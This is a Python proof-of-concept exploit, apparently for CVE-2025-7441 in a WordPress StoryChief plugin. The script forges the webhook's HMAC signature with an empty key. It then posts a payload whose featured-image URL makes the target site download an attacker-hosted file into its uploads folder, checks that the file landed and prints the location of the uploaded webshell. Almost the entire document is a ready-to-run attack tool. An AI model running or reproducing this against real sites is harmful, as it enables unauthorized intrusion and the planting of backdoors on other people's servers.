1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94

from datetime import datetime
import requests
import json
import hmac
import hashlib
import sys
import time
import os

def banner():
    print(r"""
  _   _  ____ _____ _   _ _____ _  __  ____    _ __   __
 | \ | |/ ___| ____| | | | ____| |/ / |  _ \  / \\ \ / /
 |  \| | |  _|  _| | |_| |  _| | ' /  | | | |/ _ \\ V / 
 | |\  | |_| | |___|  _  | |___| . \  | |_| / ___ \| |  
 |_| \_|\____|_____|_| |_|_____|_|\_\ |____/_/   \_\_|  
                                                        
  PoC exploit CVE-2025-7441 by xpl0dec
    """)

if __name__ == "__main__":
    banner()
    if len(sys.argv) != 3:
        print(f"Usage: {sys.argv[0]} <target_url> <backdoor_url>")
        sys.exit(1)

    url = sys.argv[1] + "/wp-json/storychief/webhook"

    dummy = {
        "meta": {
            "event": "publish"
        },
        "data": {
            "featured_image": {
                "data": {
                    "sizes": {
                        "full": sys.argv[2]
                    }
                }
            }
        }
    }

    json_string = json.dumps(dummy, separators=(',', ':'), ensure_ascii=True)
    json_string = json_string.replace("/", "\\/").encode()

    signature = hmac.new(
        "".encode(),
        json_string,
        digestmod=hashlib.sha256
    ).hexdigest()

    headers = {
        "Content-Type": "application/json"
    }

    payload = {
        "meta": {
            "mac" : signature,
            "event": "publish"
        },
        "data": {
            "featured_image": {
                "data": {
                    "sizes": {
                        "full": sys.argv[2]
                    }
                }
            }
        }
    }

    print("[+] 获取hmac... [+]")
    time.sleep(2)
    print("hmac : " + signature)

    response = requests.post(url, headers=headers, data=json.dumps(payload))

    if "permalink" in response.text:
        print("[+] 响应成功 [+]")
        time.sleep(2)
        print("[+] 检查上传的后门... [+]")

    current_datetime = datetime.now()
    month = str(current_datetime.month).zfill(2)
    year = current_datetime.year
    file_backdoor = os.path.basename(sys.argv[2])
    
    get_backdoor = requests.get(sys.argv[1] + f"/wp-content/uploads/{year}/{month}/{file_backdoor}")

    if get_backdoor.status_code == 200:
        print("[+] 漏洞利用成功 [+]")
        time.sleep(2)
        print("Webshell上传位置: " + sys.argv[1] + f"/wp-content/uploads/{year}/{month}/{file_backdoor}")